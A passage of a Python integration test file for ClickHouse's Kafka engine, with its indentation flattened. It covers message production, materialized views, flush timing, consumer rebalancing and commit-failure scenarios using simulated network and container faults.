producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
time.sleep(10)
members = describe_consumer_group('virt2')
#pprint.pprint(members)
members[0]['client_id'] = u'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = u'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(240)
def test_kafka_produce_key_timestamp(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1,1,'k1',1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2,2,'k2',1577836802))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3,3,'k3',1577836803,4,4,'k4',1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5,5,'k5',1577836805))
time.sleep(10)
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# print(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_time', messages)
time.sleep(1)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(18)
result = instance.query('SELECT count() FROM test.view')
print(result)
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 40 = 2 flushes (7.5 sec), 15 polls each, about 1 mgs per 1.5 sec
assert int(result) > 12, 'Messages from kafka should be flushed at least every stream_flush_interval_ms!'
@pytest.mark.timeout(600)
def test_kafka_flush_by_block_size(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for _ in range(101):
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_block_size', messages)
time.sleep(1)
# TODO: due to https://github.com/ClickHouse/ClickHouse/issues/11216
# second flush happens earlier than expected, so we have 2 parts here instead of one
# flush by block size works correctly, so the feature checked by the test is working correctly
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(result) == 100, 'Messages from kafka should be flushed at least every stream_flush_interval_ms!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3,10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce('topic_with_multiple_partitions2', messages)
time.sleep(30)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count) )
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS=11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
#time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce('topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
print("Setting up {}".format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
while int(instance.query("SELECT count() FROM test.destination WHERE _consumed_by='{}'".format(table_name))) == 0:
print("Waiting for test.kafka_consumer{} to start consume".format(consumer_index))
time.sleep(1)
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS-1):
print("Dropping test.kafka_consumer{}".format(consumer_index))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{}'.format(consumer_index))
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka_consumer{}'".format(consumer_index))) == 1:
time.sleep(1)
# print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
print("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed,msg_index[0]))
print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
print("kafka_consumer{}".format(consumer_index))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(1200)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(1);
''')
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# so i use sleepEachRow
with PartitionManager() as pm:
time.sleep(12)
pm.drop_instance_zk_connections(instance)
time.sleep(20)
pm.heal_all
# connection restored and it will take a while until next block will be flushed
# it takes years on CI :\
time.sleep(90)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("ZooKeeper session has been expired.: while write prefix to view")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
#kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(1)]
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) == 0:
print("Waiting for test.kafka_consumer to start consume")
time.sleep(1)
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
time.sleep(1)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(12)
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000;
''')
cancel.set()
time.sleep(15)
#kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
print(result)
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0]-1)), 'Missing data!'
@pytest.mark.timeout(120)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(1200)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.5);
''')
#print time.strftime("%m/%d/%Y %H:%M:%S")
time.sleep(12) # 5-6 sec to connect to kafka, do subscription, and fetch 20 rows, another 10 sec for MV, after that commit should happen
#print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.pause_container('kafka1')
# that timeout it VERY important, and picked after lot of experiments
# when too low (<30sec) librdkafka will not report any timeout (alternative is to decrease the default session timeouts for librdkafka)
# when too high (>50sec) broker will decide to remove us from the consumer group, and will start answering "Broker: Unknown member"
time.sleep(40)
#print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.unpause_container('kafka1')
#kafka_cluster.open_bash_shell('instance')
# connection restored and it will take a while until next block will be flushed
# it takes years on CI :\
time.sleep(30)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("Local: Waiting for coordinator")
assert instance.contains_in_log("All commit attempts failed")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
if __name__ == '__main__':
cluster.start()
raw_input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.